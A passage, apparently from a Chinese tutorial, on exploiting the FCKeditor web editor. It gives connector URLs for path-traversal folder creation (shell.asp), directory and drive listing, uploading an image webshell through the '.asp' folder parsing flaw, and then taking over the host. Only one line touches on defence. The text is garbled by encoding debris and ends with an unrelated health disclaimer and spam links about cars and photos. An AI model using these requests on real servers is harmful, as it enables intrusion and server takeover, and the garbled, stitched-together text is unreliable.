3.4 文件解析限制
通過(guò)Fckeditor編輯器在文件上傳頁(yè)面中，創(chuàng)建諸如1.asp文件夾，然后再到該文件夾下上傳一個(gè)圖片的
webshell文件，獲取其shell 。
http://127.0.0.1/images/upload/201806/image/1.asp/1.jpg
4.列目錄
4.1 FCKeditor/editor/fckeditor.html
FCKeditor/editor/fckeditor.html不可以上傳文件，可以點(diǎn)擊上傳圖片按鈕再選擇瀏覽服務(wù)器即可跳
轉(zhuǎn)至可上傳文件頁(yè)，可以查看已經(jīng)上傳的文件 。
4.2 根據(jù)xml返回信息查看網(wǎng)站目錄
http://127.0.0.1/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.as
px?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
4.3 獲取當(dāng)前文件夾
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
4.4 瀏覽E盤(pán)文件
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/
5. 連接木馬
在木馬能夠解析之后，使用各類(lèi)工具連接到木馬，獲取webshell 。至此，利用FCKeditor進(jìn)行文件上傳
并攻擊的過(guò)程就已經(jīng)完成
三. 其他
在獲取到webshell之后，可以進(jìn)行的操作非常多，也便于提權(quán)操作，拿下主機(jī)權(quán)限并不困難 。
關(guān)于該漏洞的防御，可以刪除掉所有的上傳點(diǎn)，并限制目錄訪問(wèn) 。

以上關(guān)于本文的內(nèi)容，僅作參考！溫馨提示：如遇健康、疾病相關(guān)的問(wèn)題，請(qǐng)您及時(shí)就醫(yī)或請(qǐng)專(zhuān)業(yè)人士給予相關(guān)指導(dǎo)!

• 二手豐田亞洲龍報(bào)價(jià)及圖片 豐田亞洲龍2.0報(bào)價(jià)
• 免費(fèi)一鍵照片變清晰的app 手機(jī)怎么讓圖片變高清
• 拼多多店鋪怎么打造一張超高點(diǎn)擊率的主圖，提高轉(zhuǎn)化率的圖片
• 什么電錘質(zhì)量好，電錘圖片
• 一汽豐田ra∨4多少錢(qián) 豐田ra 4新款圖片
• word文檔轉(zhuǎn)換成圖片的方法 怎么把word保存成圖片
• 服務(wù)器上傳文件用的方法 服務(wù)器上傳文件一般用什么
• 2022支付寶集五福圖片大全福字 2022五福敬業(yè)福友善福愛(ài)國(guó)福圖片大全
• 自制美味誘人的大披薩 自做披薩圖片
• 京東家具城沙發(fā)類(lèi) 「京東沙發(fā)圖片價(jià)格全友」